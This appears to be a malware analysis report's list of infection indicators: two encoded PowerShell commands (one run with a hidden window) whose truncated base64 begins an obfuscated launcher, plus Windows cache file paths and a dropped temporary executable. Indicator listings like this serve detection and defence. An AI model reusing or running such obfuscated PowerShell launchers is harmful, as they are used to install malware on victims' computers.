Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAEwAQwBVAFUAZgBoAGQAPQAnAFcASwBXAEYAUgBzAGQAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAYABVAHIAaQB0AHkAcABgAFIAbwB0AE8AYwBvAEwAIgAgAD...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\meqh.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAEwAQwBVAFUAZgBoAGQAPQAnAFcASwBXAEYAUgBzAGQAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAYABVAHIAaQB0AHkAcABgAFIAbwB0AE8AYwBvAEwAIgAgAD...' (with a hidden window)